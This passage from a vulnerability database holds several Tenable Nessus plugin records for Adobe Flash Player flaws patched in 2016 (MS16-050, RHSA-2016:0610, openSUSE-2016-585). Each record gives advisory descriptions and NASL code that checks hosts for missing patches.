"CVE-2016-1013", "CVE-2016-1014", "CVE-2016-1015", "CVE-2016-1016", "CVE-2016-1017", "CVE-2016-1018", "CVE-2016-1019", "CVE-2016-1020", "CVE-2016-1021", "CVE-2016-1022", "CVE-2016-1023", "CVE-2016-1024", "CVE-2016-1025", "CVE-2016-1026", "CVE-2016-1027", "CVE-2016-1028", "CVE-2016-1029", "CVE-2016-1030", "CVE-2016-1031", "CVE-2016-1032", "CVE-2016-1033"], "modified": "2022-03-08T00:00:00", "cpe": ["cpe:/a:adobe:flash_player"], "id": "SMB_NT_MS16-050.NASL", "href": "https://www.tenable.com/plugins/nessus/90443", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(90443);\n script_version(\"1.18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/03/08\");\n\n script_cve_id(\n \"CVE-2016-1006\",\n \"CVE-2016-1011\",\n \"CVE-2016-1012\",\n \"CVE-2016-1013\",\n \"CVE-2016-1014\",\n \"CVE-2016-1015\",\n 
\"CVE-2016-1016\",\n \"CVE-2016-1017\",\n \"CVE-2016-1018\",\n \"CVE-2016-1019\",\n \"CVE-2016-1020\",\n \"CVE-2016-1021\",\n \"CVE-2016-1022\",\n \"CVE-2016-1023\",\n \"CVE-2016-1024\",\n \"CVE-2016-1025\",\n \"CVE-2016-1026\",\n \"CVE-2016-1027\",\n \"CVE-2016-1028\",\n \"CVE-2016-1029\",\n \"CVE-2016-1030\",\n \"CVE-2016-1031\",\n \"CVE-2016-1032\",\n \"CVE-2016-1033\"\n );\n script_bugtraq_id(\n 85856,\n 85926,\n 85927,\n 85928,\n 85930,\n 85931,\n 85932,\n 85933\n );\n script_xref(name:\"MSFT\", value:\"MS16-050\");\n script_xref(name:\"MSKB\", value:\"3154132\");\n script_xref(name:\"ZDI\", value:\"ZDI-16-225\");\n script_xref(name:\"ZDI\", value:\"ZDI-16-226\");\n script_xref(name:\"ZDI\", value:\"ZDI-16-227\");\n script_xref(name:\"ZDI\", value:\"ZDI-16-228\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/03/24\");\n\n script_name(english:\"MS16-050: Security Update for Adobe Flash Player (3154132)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host has a browser plugin installed that is\naffected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing KB3154132. It is, therefore,\naffected by multiple vulnerabilities :\n\n - An Address Space Layout Randomization (ASLR) bypass\n vulnerability exists that allows an attacker to predict\n memory offsets in the call stack. (CVE-2016-1006)\n\n - Multiple use-after-free errors exist that allow an\n attacker to execute arbitrary code. (CVE-2016-1011,\n CVE-2016-1013, CVE-2016-1016, CVE-2016-1017,\n CVE-2016-1031)\n\n - Multiple memory corruption issues exist that allow an\n attacker to execute arbitrary code. 
(CVE-2016-1012,\n CVE-2016-1020, CVE-2016-1021, CVE-2016-1022,\n CVE-2016-1023, CVE-2016-1024, CVE-2016-1025,\n CVE-2016-1026, CVE-2016-1027, CVE-2016-1028,\n CVE-2016-1029, CVE-2016-1032, CVE-2016-1033)\n\n - A directory search path vulnerability exists that allows\n an attacker to disclose sensitive resources.\n (CVE-2016-1014)\n\n - Multiple type confusion errors exist that allow an\n attacker to execute arbitrary code. (CVE-2016-1015,\n CVE-2016-1019)\n\n - An overflow condition exists that is triggered when\n handling JPEG-XR compressed image content. An attacker\n can exploit this to execute arbitrary code.\n (CVE-2016-1018)\n\n - An unspecified security bypass vulnerability exists.\n (CVE-2016-1030)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2016/ms16-050\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb16-10.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released a set of patches for Windows 2012, 8.1, RT 8.1,\n2012 R2, and 10. 
Alternatively, apply the workarounds as referenced in\nthe Microsoft advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-1033\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/03/16\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/04/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/04/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:flash_player\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_activex_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS16-050\";\nkbs = make_list(\"3154132\");\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win8:'0', win81:'0', win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\nif (hotfix_check_server_core() == 1) audit(AUDIT_WIN_SERVER_CORE);\n\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows 8\" >< productname && \"Windows 8.1\" >!< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nif (activex_init() != ACX_OK) audit(AUDIT_FN_FAIL, \"activex_init()\");\n\n# Adobe Flash Player CLSID\nclsid = '{D27CDB6E-AE6D-11cf-96B8-444553540000}';\n\nfile = activex_get_filename(clsid:clsid);\nif (isnull(file))\n{\n activex_end();\n audit(AUDIT_FN_FAIL, \"activex_get_filename\", \"NULL\");\n}\nif (!file)\n{\n activex_end();\n audit(AUDIT_ACTIVEX_NOT_FOUND, clsid);\n}\n\n# Get its version.\nversion = activex_get_fileversion(clsid:clsid);\nif (!version)\n{\n activex_end();\n audit(AUDIT_VER_FAIL, file);\n}\n\ninfo = '';\n\niver = split(version, sep:'.', keep:FALSE);\nfor (i=0; i<max_index(iver); i++)\n iver[i] = int(iver[i]);\niver = join(iver, sep:\".\");\n\nfix = FALSE;\nif(iver =~ \"^(19|20|21)\\.\" && ver_compare(ver:iver, fix:\"21.0.0.197\", strict:FALSE) <= 0)\n fix = \"21.0.0.213\";\nelse if(ver_compare(ver:iver, 
fix:\"18.0.0.333\", strict:FALSE) <= 0)\n fix = \"18.0.0.343\";\n\nif (\n (report_paranoia > 1 || activex_get_killbit(clsid:clsid) == 0) &&\n fix\n)\n{\n info = '\\n Path : ' + file +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fix +\n '\\n';\n}\n\nport = kb_smb_transport();\n\nif (info != '')\n{\n if (report_paranoia > 1)\n {\n report = info +\n '\\n' +\n 'Note, though, that Nessus did not check whether the kill bit was\\n' +\n \"set for the control's CLSID because of the Report Paranoia setting\" + '\\n' +\n 'in effect when this scan was run.\\n';\n }\n else\n {\n report = info +\n '\\n' +\n 'Moreover, its kill bit is not set so it is accessible via Internet\\n' +\n 'Explorer.\\n';\n }\n set_kb_item(name:\"SMB/Missing/\"+bulletin, value:TRUE);\n hotfix_add_report(bulletin:'MS16-050', kb:'3154132', report);\n security_report_v4(severity:SECURITY_HOLE, port:port, extra:hotfix_get_report());\n}\nelse audit(AUDIT_HOST_NOT, 'affected');\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-11T16:07:20", "description": "An update for flash-plugin is now available for Red Hat Enterprise Linux 5 Supplementary and Red Hat Enterprise Linux 6 Supplementary.\n\nRed Hat Product Security has rated this update as having a security impact of Critical. 
A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.\n\nThe flash-plugin package contains a Mozilla Firefox compatible Adobe Flash Player web browser plug-in.\n\nThis update upgrades Flash Player to version 11.2.202.616.\n\nSecurity Fix(es) :\n\n* This update fixes multiple vulnerabilities in Adobe Flash Player.\nThese vulnerabilities, detailed in the Adobe Security Bulletin listed in the References section, could allow an attacker to create a specially crafted SWF file that would cause flash-plugin to crash, execute arbitrary code, or disclose sensitive information when the victim loaded a page containing the malicious SWF content.\n(CVE-2016-1006, CVE-2016-1011, CVE-2016-1012, CVE-2016-1013, CVE-2016-1014, CVE-2016-1015, CVE-2016-1016, CVE-2016-1017, CVE-2016-1018, CVE-2016-1019, CVE-2016-1020, CVE-2016-1021, CVE-2016-1022, CVE-2016-1023, CVE-2016-1024, CVE-2016-1025, CVE-2016-1026, CVE-2016-1027, CVE-2016-1028, CVE-2016-1029, CVE-2016-1030, CVE-2016-1031, CVE-2016-1032, CVE-2016-1033)", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-04-13T00:00:00", "type": "nessus", "title": "RHEL 5 / 6 : flash-plugin (RHSA-2016:0610)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-1006", "CVE-2016-1011", "CVE-2016-1012", "CVE-2016-1013", "CVE-2016-1014", "CVE-2016-1015", "CVE-2016-1016", "CVE-2016-1017", "CVE-2016-1018", "CVE-2016-1019", "CVE-2016-1020", "CVE-2016-1021", "CVE-2016-1022", "CVE-2016-1023", "CVE-2016-1024", "CVE-2016-1025", "CVE-2016-1026", "CVE-2016-1027", "CVE-2016-1028", "CVE-2016-1029", "CVE-2016-1030", "CVE-2016-1031", "CVE-2016-1032", "CVE-2016-1033"], "modified": "2022-03-08T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:flash-plugin", "cpe:/o:redhat:enterprise_linux:5", "cpe:/o:redhat:enterprise_linux:6", "cpe:/o:redhat:enterprise_linux:6.7"], "id": 
"REDHAT-RHSA-2016-0610.NASL", "href": "https://www.tenable.com/plugins/nessus/90490", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2016:0610. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(90490);\n script_version(\"2.18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/03/08\");\n\n script_cve_id(\n \"CVE-2016-1006\",\n \"CVE-2016-1011\",\n \"CVE-2016-1012\",\n \"CVE-2016-1013\",\n \"CVE-2016-1014\",\n \"CVE-2016-1015\",\n \"CVE-2016-1016\",\n \"CVE-2016-1017\",\n \"CVE-2016-1018\",\n \"CVE-2016-1019\",\n \"CVE-2016-1020\",\n \"CVE-2016-1021\",\n \"CVE-2016-1022\",\n \"CVE-2016-1023\",\n \"CVE-2016-1024\",\n \"CVE-2016-1025\",\n \"CVE-2016-1026\",\n \"CVE-2016-1027\",\n \"CVE-2016-1028\",\n \"CVE-2016-1029\",\n \"CVE-2016-1030\",\n \"CVE-2016-1031\",\n \"CVE-2016-1032\",\n \"CVE-2016-1033\"\n );\n script_xref(name:\"RHSA\", value:\"2016:0610\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/03/24\");\n\n script_name(english:\"RHEL 5 / 6 : flash-plugin (RHSA-2016:0610)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Red Hat host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update for flash-plugin is now available for Red Hat Enterprise\nLinux 5 Supplementary and Red Hat Enterprise Linux 6 Supplementary.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Critical. 
A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe flash-plugin package contains a Mozilla Firefox compatible Adobe\nFlash Player web browser plug-in.\n\nThis update upgrades Flash Player to version 11.2.202.616.\n\nSecurity Fix(es) :\n\n* This update fixes multiple vulnerabilities in Adobe Flash Player.\nThese vulnerabilities, detailed in the Adobe Security Bulletin listed\nin the References section, could allow an attacker to create a\nspecially crafted SWF file that would cause flash-plugin to crash,\nexecute arbitrary code, or disclose sensitive information when the\nvictim loaded a page containing the malicious SWF content.\n(CVE-2016-1006, CVE-2016-1011, CVE-2016-1012, CVE-2016-1013,\nCVE-2016-1014, CVE-2016-1015, CVE-2016-1016, CVE-2016-1017,\nCVE-2016-1018, CVE-2016-1019, CVE-2016-1020, CVE-2016-1021,\nCVE-2016-1022, CVE-2016-1023, CVE-2016-1024, CVE-2016-1025,\nCVE-2016-1026, CVE-2016-1027, CVE-2016-1028, CVE-2016-1029,\nCVE-2016-1030, CVE-2016-1031, CVE-2016-1032, CVE-2016-1033)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb16-10.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsa16-01.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2016:0610\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2016-1030\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2016-1031\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2016-1032\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2016-1033\");\n 
script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2016-1016\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2016-1017\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2016-1014\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2016-1015\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2016-1012\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2016-1013\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2016-1011\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2016-1018\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2016-1019\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2016-1023\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2016-1022\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2016-1021\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2016-1006\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2016-1027\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2016-1026\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2016-1025\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2016-1024\");\n script_set_attribute(attribute:\"see_also\", 
value:\"https://access.redhat.com/security/cve/cve-2016-1029\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2016-1028\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2016-1020\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected flash-plugin package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-1033\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/04/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/04/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/04/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:flash-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.7\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(5|6)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.x / 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2016:0610\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL5\", reference:\"flash-plugin-11.2.202.616-1.el5\")) flag++;\n\n\n if (rpm_check(release:\"RHEL6\", reference:\"flash-plugin-11.2.202.616-1.el6_7\")) flag++;\n\n\n if (flag)\n {\n flash_plugin_caveat = '\\n' +\n 'NOTE: This vulnerability check only applies to RedHat released\\n' +\n 'versions of the flash-plugin 
package. This check does not apply to\\n' +\n 'Adobe released versions of the flash-plugin package, which are\\n' +\n 'versioned similarly and cause collisions in detection.\\n\\n' +\n\n 'If you are certain you are running the Adobe released package of\\n' +\n 'flash-plugin and are running a version of it equal or higher to the\\n' +\n 'RedHat version listed above then you can consider this a false\\n' +\n 'positive.\\n';\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat() + flash_plugin_caveat\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"flash-plugin\");\n }\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:41:35", "description": "Versions of Adobe Flash Player prior to 11.2.202.616, 18.0.0.343, or 21.0.0.213 are outdated and thus unpatched for the following vulnerabilities :\n\n - A JIT Spraying Attack vulnerability exists that may allow a context-dependent attacker to disable the Address Space Layout Randomization (ASLR) feature, potentially allowing them to more easily conduct more severe attacks. (CVE-2016-1006)\n - A use-after-free error exists, which may allow a context-dependent attacker to dereference already freed memory and potentially execute arbitrary code. (CVE-2016-1011)\n - An unspecified flaw exists that is triggered as user-supplied input is not properly validated. This may allow a context-dependent attacker to corrupt memory and potentially execute arbitrary code. (CVE-2016-1012)\n - An unspecified use-after-free error exists, which may allow a context-dependent attacker to dereference already freed memory and potentially execute arbitrary code. 
(CVE-2016-1013)\n - An unspecified flaw exists in the handling of directory search paths that may allow a context-dependent attacker to gain unauthorized access to potentially sensitive resources. (CVE-2016-1014)\n - A type confusion flaw exists that is triggered when handling AS2 NetConnection objects. This may allow a context-dependent attacker to execute arbitrary code. (CVE-2016-1015)\n - A use-after-free error exists that is triggered when setting a special callback on the 'flash.geom.Matrix object'. This may allow a context-dependent attacker to dereference already freed memory and execute arbitrary code. (CVE-2016-1016)\n - A use-after-free error exists that is triggered during 'LoadVars.decode' handling. This may allow a context-dependent attacker to dereference already freed memory and execute arbitrary code. (CVE-2016-1017)\n - An overflow condition exists that is triggered when handling JPEG-XR compressed image content. The issue lies in the failure to properly check that an index is within the bounds of a buffer. An attacker can leverage this vulnerability to execute arbitrary code under the context of the current process. (CVE-2016-1018)\n - A type confusion flaw exists in the ASnative API that may allow a context-dependent attacker to potentially execute arbitrary code. Adobe states that this issue is being actively exploited against systems running Windows. Current exploits only target version 20.0.0.306 and earlier due to a mitigation implemented in version 21.0.0.182 and later. (CVE-2016-1019)\n - A number of unspecified flaws exists that are triggered as user-supplied input is not properly validated. This may allow a context-dependent attacker to corrupt memory and potentially execute arbitrary code. 
(CVE-2016-1020, CVE-2016-1021, CVE-2016-1022, CVE-2016-1023, CVE-2016-1024, CVE-2016-1025, CVE-2016-1026, CVE-2016-1027, CVE-2016-1028, CVE-2016-1029, CVE-2016-1032, CVE-2016-1033)\n - An unspecified flaw exists that may allow a context-dependent attacker to bypass security features. No further details have been provided by the vendor. (CVE-2016-1030)\n - A use-after-free error exists, which may allow a context-dependent attacker to dereference already freed memory and potentially execute arbitrary code. No further details have been provided by the vendor.(CVE-2016-1031)", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-05-20T00:00:00", "type": "nessus", "title": "Flash Player < 11.2.202.616 / 18.0.0.343 / 21.0.0.213 Multiple Vulnerabilities (APSB16-10)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-1019", "CVE-2016-1006", "CVE-2016-1011", "CVE-2016-1012", "CVE-2016-1013", "CVE-2016-1014", "CVE-2016-1015", "CVE-2016-1016", "CVE-2016-1017", "CVE-2016-1018", "CVE-2016-1020", "CVE-2016-1021", "CVE-2016-1022", "CVE-2016-1023", "CVE-2016-1024", "CVE-2016-1025", "CVE-2016-1026", "CVE-2016-1027", "CVE-2016-1028", "CVE-2016-1029", "CVE-2016-1030", "CVE-2016-1031", "CVE-2016-1032", "CVE-2016-1033"], "modified": "2019-03-06T00:00:00", "cpe": ["cpe:2.3:a:adobe:flash_player:*:*:*:*:*:*:*:*"], "id": "9276.PRM", "href": "https://www.tenable.com/plugins/nnm/9276", "sourceData": "Binary data 9276.prm", "cvss": {"score": 10, "vector": "CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-16T20:25:09", "description": "This security update for flash-player to 11.2.202.621 fixes the following issues (boo#979422) :\n\nA critical vulnerability (CVE-2016-4117) exists in Adobe Flash Player 21.0.0.226 and earlier versions for Windows, Macintosh, Linux, and Chrome OS. Successful exploitation could cause a crash and potentially allow an attacker to take control of the affected system. 
(APSA16-02)\n\nhttps://helpx.adobe.com/security/products/flash-player/apsa16-02.html\n\nSome CVEs were not listed in the last submission :\n\n - APSA16-01, APSB16-10, CVE-2016-1006, CVE-2016-1011, CVE-2016-1012, CVE-2016-1013, CVE-2016-1014, CVE-2016-1015, CVE-2016-1016, CVE-2016-1017, CVE-2016-1018, CVE-2016-1019, CVE-2016-1020, CVE-2016-1021, CVE-2016-1022, CVE-2016-1023, CVE-2016-1024, CVE-2016-1025, CVE-2016-1026, CVE-2016-1027, CVE-2016-1028, CVE-2016-1029, CVE-2016-1030, CVE-2016-1031, CVE-2016-1032, CVE-2016-1033", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-05-17T00:00:00", "type": "nessus", "title": "openSUSE Security Update : flash-player (openSUSE-2016-585)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-1006", "CVE-2016-1011", "CVE-2016-1012", "CVE-2016-1013", "CVE-2016-1014", "CVE-2016-1015", "CVE-2016-1016", "CVE-2016-1017", "CVE-2016-1018", "CVE-2016-1019", "CVE-2016-1020", "CVE-2016-1021", "CVE-2016-1022", "CVE-2016-1023", "CVE-2016-1024", "CVE-2016-1025", "CVE-2016-1026", "CVE-2016-1027", "CVE-2016-1028", "CVE-2016-1029", "CVE-2016-1030", "CVE-2016-1031", "CVE-2016-1032", "CVE-2016-1033", "CVE-2016-4117"], "modified": "2022-03-08T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:flash-player", "p-cpe:/a:novell:opensuse:flash-player-gnome", "p-cpe:/a:novell:opensuse:flash-player-kde4", "cpe:/o:novell:opensuse:13.2"], "id": "OPENSUSE-2016-585.NASL", "href": "https://www.tenable.com/plugins/nessus/91178", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2016-585.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(91178);\n script_version(\"2.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", 
value:\"2022/03/08\");\n\n script_cve_id(\n \"CVE-2016-1006\",\n \"CVE-2016-1011\",\n \"CVE-2016-1012\",\n \"CVE-2016-1013\",\n \"CVE-2016-1014\",\n \"CVE-2016-1015\",\n \"CVE-2016-1016\",\n \"CVE-2016-1017\",\n \"CVE-2016-1018\",\n \"CVE-2016-1019\",\n \"CVE-2016-1020\",\n \"CVE-2016-1021\",\n \"CVE-2016-1022\",\n \"CVE-2016-1023\",\n \"CVE-2016-1024\",\n \"CVE-2016-1025\",\n \"CVE-2016-1026\",\n \"CVE-2016-1027\",\n \"CVE-2016-1028\",\n \"CVE-2016-1029\",\n \"CVE-2016-1030\",\n \"CVE-2016-1031\",\n \"CVE-2016-1032\",\n \"CVE-2016-1033\",\n \"CVE-2016-4117\"\n );\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/03/24\");\n\n script_name(english:\"openSUSE Security Update : flash-player (openSUSE-2016-585)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote openSUSE host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"This security update for flash-player to 11.2.202.621 fixes the\nfollowing issues (boo#979422) :\n\nA critical vulnerability (CVE-2016-4117) exists in Adobe Flash Player\n21.0.0.226 and earlier versions for Windows, Macintosh, Linux, and\nChrome OS. Successful exploitation could cause a crash and potentially\nallow an attacker to take control of the affected system. 
